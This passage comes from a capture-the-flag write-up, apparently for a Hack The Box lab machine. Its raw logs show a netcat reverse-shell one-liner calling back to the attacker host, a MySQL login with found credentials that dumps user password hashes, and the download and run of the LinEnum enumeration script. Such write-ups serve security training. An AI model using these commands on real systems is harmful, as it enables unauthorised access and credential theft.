root 70 0.0 0.0 0 0 ? S< 14:48 0:00 [kmpathd/0]
root 72 0.0 0.0 0 0 ? S< 14:48 0:00 [kmpath_handlerd]
root 74 0.0 0.0 0 0 ? S< 14:48 0:00 [ksnapd]
root 76 0.0 0.0 0 0 ? S< 14:48 0:00 [kondemand/0]
root 78 0.0 0.0 0 0 ? S< 14:48 0:00 [kconservative/0]
root 80 0.0 0.0 0 0 ? S< 14:48 0:00 [krfcommd]
root 202 0.0 0.0 0 0 ? S< 14:48 0:00 [mpt_poll_0]
root 293 0.0 0.0 0 0 ? S< 14:48 0:00 [mpt/0]
root 417 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_32]
root 432 0.0 0.0 0 0 ? S< 14:48 0:00 [kdmflush]
root 434 0.0 0.0 0 0 ? S< 14:48 0:00 [kdmflush]
root 524 0.0 0.0 0 0 ? S< 14:48 0:00 [kjournald2]
root 574 0.0 0.0 2284 836 ? S 14:48 0:00 upstart-udev-bridge --daemon
root 577 0.0 0.1 2768 1224 ? S<s 14:48 0:00 udevd --daemon
root 777 0.0 0.1 2764 1184 ? S< 14:48 0:00 udevd --daemon
root 778 0.0 0.1 2764 1184 ? S< 14:48 0:00 udevd --daemon
root 820 0.0 0.0 0 0 ? S< 14:48 0:00 [kpsmoused]
root 878 0.0 0.0 1852 544 ? Ss 14:48 0:00 dd bs=1 if=/proc/kmsg of=/var/run/rsyslog/kmsg
syslog 921 0.0 0.1 33528 1536 ? Sl 14:48 0:00 rsyslogd -c4
root 1075 0.0 0.0 1704 544 tty4 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty4
root 1082 0.0 0.0 1704 544 tty5 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty5
root 1085 0.0 0.0 1704 544 tty2 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty2
root 1086 0.0 0.0 1704 540 tty3 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty3
root 1088 0.0 0.0 1704 548 tty6 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty6
root 1096 0.0 0.0 2092 872 ? Ss 14:48 0:00 cron
daemon 1097 0.0 0.0 1964 420 ? Ss 14:48 0:00 atd
root 1239 0.0 0.0 1752 536 ? S 14:48 0:00 /bin/sh /usr/bin/mysqld_safe
root 1279 0.0 0.0 0 0 ? S< 14:48 0:00 [vmmemctl]
mysql 1485 0.0 1.8 147048 18612 ? Sl 14:48 0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 1487 0.0 0.0 1668 548 ? S 14:48 0:00 logger -t mysqld -p daemon.error
root 1637 0.0 0.6 33324 6980 ? Ss 14:48 0:00 /usr/sbin/apache2 -k start
root 1657 0.0 0.0 1704 548 tty1 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty1
root 1659 0.0 0.3 17008 3812 ? Sl 14:48 0:03 /usr/sbin/vmtoolsd
root 1697 0.0 0.7 13752 7680 ? S 14:48 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root 1717 0.0 0.0 2144 304 ? Ss 14:48 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0
root 1767 0.0 0.1 5436 1076 ? Ss 14:48 0:00 /usr/sbin/sshd
www-data 1840 0.0 0.7 34180 7348 ? S 15:09 0:00 /usr/sbin/apache2 -k start
www-data 1843 0.0 0.7 34228 8040 ? S 15:09 0:00 /usr/sbin/apache2 -k start
www-data 1844 0.0 0.7 34244 7536 ? S 15:09 0:00 /usr/sbin/apache2 -k start
www-data 1854 0.0 0.7 34208 7504 ? S 15:17 0:00 /usr/sbin/apache2 -k start
www-data 1859 0.0 0.7 34308 7572 ? S 15:18 0:00 /usr/sbin/apache2 -k start
www-data 1868 0.0 0.6 34040 6752 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 1869 0.0 0.4 33908 4708 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 1870 0.0 0.6 34068 6936 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 1871 0.0 0.6 33908 6728 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 1889 0.0 0.6 33672 6284 ? S 15:46 0:00 /usr/sbin/apache2 -k start
www-data 1890 0.0 0.0 1752 488 ? S 15:57 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
www-data 1893 0.0 0.0 1704 412 ? S 15:57 0:00 cat /tmp/f
www-data 1894 0.0 0.0 1752 504 ? R 15:57 0:00 sh -i
www-data 1895 0.0 0.0 1724 608 ? R 15:57 0:00 nc 10.10.14.4 443
www-data 1905 0.0 0.0 2364 928 ? R 16:02 0:00 ps -aux
$

21. Log in to the database with the credentials found above and take a look

$ 
$ mysql -u 'torrent' --password='SuperSecret!!' -e 'show databases'
Database
information_schema
torrenthoster
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'show tables
> '
Tables_in_torrenthoster
ban
categories
comments
log
namemap
news
subcategories
users
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'users'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'users' at line 1
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'describe users'
Field Type Null Key Default Extra
id int(10) unsigned NO PRI NULL auto_increment
userName varchar(40) NO UNI
password varchar(40) NO
privilege varchar(10) NO
email varchar(30) NO
joined datetime NO 0000-00-00 00:00:00
lastconnect datetime NO 0000-00-00 00:00:00
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster 'select userName,password from users'
ERROR 1044 (42000): Access denied for user 'torrent'@'localhost' to database 'select userName,password from users'
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'select userName,password from users'
userName password
Admin d5bfedcee289e5e05b86daad8ee3e2e2
test 098f6bcd4621d373cade4e832627b4f6
$

22. But the admin password hash could not be cracked. I also tried the database password to SSH in as george, which failed, and su from the initial shell did not work either, so this password is not the right one.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh george@10.10.10.6
Unable to negotiate with 10.10.10.6 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -oHostKeyAlgorithms=+ssh-dss george@10.10.10.6
The authenticity of host '10.10.10.6 (10.10.10.6)' can't be established.
DSA key fingerprint is SHA256:aioUHN0baIWMqg/K4OfQoSDFWO0jbTlod7tSnXT8YrM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.6' (DSA) to the list of known hosts.
george@10.10.10.6's password:
Permission denied, please try again.
george@10.10.10.6's password:
Permission denied, please try again.
george@10.10.10.6's password:
george@10.10.10.6: Permission denied (publickey,password).

$ su george
su: must be run from a terminal
$ su - george
su: must be run from a terminal
$

23. I then rummaged through george's home directory and still found nothing (key lesson: I was careless here and only skimmed the directory instead of going through the files one by one).

$ pwd
/home/george
$ ls -la
total 860
drwxr-xr-x 3 george george 4096 Oct 26 14:57 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
lrwxrwxrwx 1 george george 9 Oct 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Jan 2 14:48 user.txt
$ cat .sudo_as_admin_successful
$ .profile
sh: .profile: not found
$ cat .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
$
$

24. So I brought out the enumeration tool LinEnum.sh and ran it.

┌──(kali㉿kali)-[~/桌面/htb-tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.6 - - [02/Jan/2024 22:28:12] "GET /LinEnum.sh HTTP/1.0" 200 -

$ cd /tmp
$
$ ls -la
total 24
drwxrwxrwt 5 root root 4096 Jan 2 16:06 .
drwxr-xr-x 21 root root 4096 Jan 2 14:48 ..
drwxrwxrwt 2 root root 4096 Jan 2 14:48 .ICE-unix
drwxrwxrwt 2 root root 4096 Jan 2 14:48 .X11-unix
prw-r--r-- 1 www-data www-data 0 Jan 2 16:30 f
-rw-r--r-- 1 root root 1600 Jan 2 14:48 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Jan 2 14:48 vmware-root
$ wget http://10.10.14.4/LinEnum.sh
--2024-01-02 16:30:22-- http://10.10.14.4/LinEnum.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: `LinEnum.sh'

0K .......... .......... .......... .......... ..... 100% 24.9K=1.8s

2024-01-02 16:30:25 (24.9 KB/s) - `LinEnum.sh' saved [46631/46631]

$ ls
LinEnum.sh
f
vgauthsvclog.txt.0
vmware-root
$


$ chmod +x ./LinEnum.sh
$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Jan 2 16:31:18 EET 2024


### SYSTEM ##############################################
[-] Kernel information:
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux


[-] Kernel information (continued):
Linux version 2.6.31-14-generic-pae (buildd@rothera) (gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu8) ) #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"


[-] Hostname:
popcorn


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/0 10.10.14.23 Tue Nov 21 19:24:41 +0200 2023
george tty1 Fri May 5 23:12:20 +0300 2017


[-] Who else is logged on:
16:31:18 up 1:43, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(landscape) gid=105(landscape) groups=105(landscape)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(george) gid=1000(george) groups=1000(george),4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin)
uid=104(mysql) gid=113(mysql) groups=113(mysql)


[-] It looks like we have some admin users:
uid=1000(george) gid=1000(george) groups=1000(george),4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:105::/var/lib/landscape:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
george:x:1000:1000:George Papagiannopoulos,,,:/home/george:/bin/bash
mysql:x:104:113:MySQL Server,,,:/var/lib/mysql:/bin/false


[-] Super user account(s):
root


[+] We can sudo without supplying a password!
usage: sudo [-n] -h | -K | -k | -L | -V | -v
usage: sudo -l[l] [-AnS] [-g groupname|#gid] [-U username] [-u username|#uid]
[-g groupname|#gid] [command]
usage: sudo [-AbEHnPS] [-C fd] [-g groupname|#gid] [-p prompt] [-u
username|#uid] [-g groupname|#gid] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AnS] [-C fd] [-g groupname|#gid] [-p prompt] [-u
username|#uid] file ...


[+] Possible sudo pwnage!
file


[-] Accounts that have recently used sudo:
/home/george/.sudo_as_admin_successful


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 17 2017 .
drwxr-xr-x 21 root root 4.0K Jan 2 14:48 ..
drwxr-xr-x 3 george george 4.0K Oct 26 14:57 george


[-] Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/tmp
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
_=/usr/bin/env


[-] Path information:
/usr/local/bin:/usr/bin:/bin
drwxr-xr-x 2 root root 4096 Mar 17 2017 /bin
drwxr-xr-x 2 root root 20480 Oct 26 2020 /usr/bin
drwxr-xr-x 2 root root 4096 Mar 17 2017 /usr/local/bin


[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen


[-] Current umask value:
u=rwx,g=rx,o=rx
0022


[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 724 Sep 15 2009 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2017 .
drwxr-xr-x 87 root root 4096 Jan 2 14:48 ..
-rw-r--r-- 1 root root 102 Sep 15 2009 .placeholder
-rw-r--r-- 1 root root 506 May 3 2011 php5

/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Mar 17 2017 .
drwxr-xr-x 87 root root 4096 Jan 2 14:48 ..
-rw-r--r-- 1 root root 102 Sep 15 2009 .placeholder
-rwxr-xr-x 1 root root 633 Nov 18 2010 apache2
-rwxr-xr-x 1 root root 189 Oct 23 2009 apport
-rwxr-xr-x 1 root root 16338 Oct 15 2009 apt
-rwxr-xr-x 1 root root 314 Sep 28 2009 aptitude
-rwxr-xr-x 1 root root 502 May 9 2009 bsdmainutils
-rwxr-xr-x 1 root root 256 Sep 20 2009 dpkg
-rwxr-xr-x 1 root root 89 Aug 20 2009 logrotate
-rwxr-xr-x 1 root root 1270 Sep 7 2009 man-db
-rwxr-xr-x 1 root root 665 Apr 29 2009 mlocate
-rwxr-xr-x 1 root root 2149 Jun 16 2009 popularity-contest
-rwxr-xr-x 1 root root 3349 Sep 15 2009 standard

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 17 2017 .
drwxr-xr-x 87 root root 4096 Jan 2 14:48 ..
-rw-r--r-- 1 root root 102 Sep 15 2009 .placeholder

/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2017 .
drwxr-xr-x 87 root root 4096 Jan 2 14:48 ..
-rw-r--r-- 1 root root 102 Sep 15 2009 .placeholder
-rwxr-xr-x 1 root root 129 Sep 15 2009 standard

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Oct 1 2020 .
drwxr-xr-x 87 root root 4096 Jan 2 14:48 ..
-rw-r--r-- 1 root root 102 Sep 15 2009 .placeholder
-rwxr-xr-x 1 root root 1413 Nov 11 2008 cvs
-rwxr-xr-x 1 root root 830 Sep 7 2009 man-db


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING ##########################################
[-] Network and IP info:
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:6b:a2
inet addr:10.10.10.6 Bcast:10.10.11.255 Mask:255.255.254.0
inet6 addr: dead:beef::250:56ff:feb9:6ba2/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:6ba2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1107625 errors:0 dropped:0 overruns:0 frame:0
TX packets:385064 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:78705835 (78.7 MB) TX bytes:30482777 (30.4 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:296 errors:0 dropped:0 overruns:0 frame:0
TX packets:296 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:44770 (44.7 KB) TX bytes:44770 (44.7 KB)


[-] ARP history:
fe80::250:56ff:feb9:d291 dev eth0 lladdr 00:50:56:b9:d2:91 router STALE
10.10.10.2 dev eth0 lladdr 00:50:56:b9:d2:91 REACHABLE


[-] Nameserver(s):
nameserver 8.8.8.8
nameserver 10.10.10.2


[-] Default route:
default via 10.10.10.2 dev eth0 metric 100


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:68 0.0.0.0:* -


### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 2528 1416 ? Ss 14:48 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 14:48 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 14:48 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 14:48 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 14:48 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 14:48 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 14:48 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< 14:48 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S< 14:48 0:00 [netns]
root 10 0.0 0.0 0 0 ? S< 14:48 0:00 [async/mgr]
root 11 0.0 0.0 0 0 ? S< 14:48 0:00 [kintegrityd/0]
root 12 0.0 0.0 0 0 ? S< 14:48 0:00 [kblockd/0]
root 13 0.0 0.0 0 0 ? S< 14:48 0:00 [kacpid]
root 14 0.0 0.0 0 0 ? S< 14:48 0:00 [kacpi_notify]
root 15 0.0 0.0 0 0 ? S< 14:48 0:00 [kacpi_hotplug]
root 16 0.0 0.0 0 0 ? S< 14:48 0:00 [ata/0]
root 17 0.0 0.0 0 0 ? S< 14:48 0:00 [ata_aux]
root 18 0.0 0.0 0 0 ? S< 14:48 0:00 [ksuspend_usbd]
root 19 0.0 0.0 0 0 ? S< 14:48 0:00 [khubd]
root 20 0.0 0.0 0 0 ? S< 14:48 0:00 [kseriod]
root 21 0.0 0.0 0 0 ? S< 14:48 0:00 [kmmcd]
root 22 0.0 0.0 0 0 ? S< 14:48 0:00 [bluetooth]
root 23 0.0 0.0 0 0 ? S 14:48 0:00 [khungtaskd]
root 24 0.0 0.0 0 0 ? S 14:48 0:00 [pdflush]
root 25 0.0 0.0 0 0 ? S 14:48 0:00 [pdflush]
root 26 0.0 0.0 0 0 ? S< 14:48 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? S< 14:48 0:00 [aio/0]
root 28 0.0 0.0 0 0 ? S< 14:48 0:00 [ecryptfs-kthrea]
root 29 0.0 0.0 0 0 ? S< 14:48 0:00 [crypto/0]
root 32 0.0 0.0 0 0 ? S< 14:48 0:00 [pciehpd]
root 34 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_0]
root 35 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_1]
root 36 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_2]
root 37 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_3]
root 38 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_4]
root 39 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_5]
root 40 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_6]
root 41 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_7]
root 42 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_8]
root 43 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_9]
root 44 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_10]
root 45 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_11]
root 46 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_12]
root 47 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_13]
root 48 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_14]
root 49 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_15]
root 50 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_16]
root 51 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_17]
root 52 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_18]
root 53 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_19]
root 54 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_20]
root 55 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_21]
root 56 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_22]
root 57 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_23]
root 58 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_24]
root 59 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_25]
root 60 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_26]
root 61 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_27]
root 62 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_28]
root 63 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_29]
root 64 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_30]
root 66 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_31]
root 68 0.0 0.0 0 0 ? S< 14:48 0:00 [kstriped]
root 70 0.0 0.0 0 0 ? S< 14:48 0:00 [kmpathd/0]
root 72 0.0 0.0 0 0 ? S< 14:48 0:00 [kmpath_handlerd]
root 74 0.0 0.0 0 0 ? S< 14:48 0:00 [ksnapd]
root 76 0.0 0.0 0 0 ? S< 14:48 0:00 [kondemand/0]
root 78 0.0 0.0 0 0 ? S< 14:48 0:00 [kconservative/0]
root 80 0.0 0.0 0 0 ? S< 14:48 0:00 [krfcommd]
root 202 0.0 0.0 0 0 ? S< 14:48 0:00 [mpt_poll_0]
root 293 0.0 0.0 0 0 ? S< 14:48 0:00 [mpt/0]
root 417 0.0 0.0 0 0 ? S< 14:48 0:00 [scsi_eh_32]
root 432 0.0 0.0 0 0 ? S< 14:48 0:00 [kdmflush]
root 434 0.0 0.0 0 0 ? S< 14:48 0:00 [kdmflush]
root 524 0.0 0.0 0 0 ? S< 14:48 0:00 [kjournald2]
root 574 0.0 0.0 2284 836 ? S 14:48 0:00 upstart-udev-bridge --daemon
root 577 0.0 0.1 2768 1224 ? S<s 14:48 0:00 udevd --daemon
root 777 0.0 0.1 2764 1184 ? S< 14:48 0:00 udevd --daemon
root 778 0.0 0.1 2764 1184 ? S< 14:48 0:00 udevd --daemon
root 820 0.0 0.0 0 0 ? S< 14:48 0:00 [kpsmoused]
root 878 0.0 0.0 1852 544 ? Ss 14:48 0:00 dd bs=1 if=/proc/kmsg of=/var/run/rsyslog/kmsg
syslog 921 0.0 0.1 33528 1536 ? Sl 14:48 0:00 rsyslogd -c4
root 1075 0.0 0.0 1704 544 tty4 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty4
root 1082 0.0 0.0 1704 544 tty5 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty5
root 1085 0.0 0.0 1704 544 tty2 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty2
root 1086 0.0 0.0 1704 540 tty3 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty3
root 1088 0.0 0.0 1704 548 tty6 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty6
root 1096 0.0 0.0 2092 872 ? Ss 14:48 0:00 cron
daemon 1097 0.0 0.0 1964 420 ? Ss 14:48 0:00 atd
root 1239 0.0 0.0 1752 536 ? S 14:48 0:00 /bin/sh /usr/bin/mysqld_safe
root 1279 0.0 0.0 0 0 ? S< 14:48 0:00 [vmmemctl]
mysql 1485 0.0 1.8 147236 18740 ? Sl 14:48 0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 1487 0.0 0.0 1668 548 ? S 14:48 0:00 logger -t mysqld -p daemon.error
root 1637 0.0 0.6 33324 6980 ? Ss 14:48 0:00 /usr/sbin/apache2 -k start
root 1657 0.0 0.0 1704 548 tty1 Ss+ 14:48 0:00 /sbin/getty -8 38400 tty1
root 1659 0.0 0.3 17008 3812 ? Sl 14:48 0:05 /usr/sbin/vmtoolsd
root 1697 0.0 0.7 13752 7680 ? S 14:48 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root 1717 0.0 0.0 2144 304 ? Ss 14:48 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0
root 1767 0.0 0.1 5436 1076 ? Ss 14:48 0:00 /usr/sbin/sshd
www-data 1840 0.0 0.7 34180 7348 ? S 15:09 0:00 /usr/sbin/apache2 -k start
www-data 1843 0.0 0.7 34228 8040 ? S 15:09 0:00 /usr/sbin/apache2 -k start
www-data 1844 0.0 0.7 34244 7536 ? S 15:09 0:00 /usr/sbin/apache2 -k start
www-data 1854 0.0 0.7 34208 7504 ? S 15:17 0:00 /usr/sbin/apache2 -k start
www-data 1859 0.0 0.7 34308 7572 ? S 15:18 0:00 /usr/sbin/apache2 -k start
www-data 1868 0.0 0.6 34040 6752 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 1869 0.0 0.4 33908 4708 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 1870 0.0 0.6 34068 6936 ? S 15:26 0:00 /usr/sbin/apache2 -k start
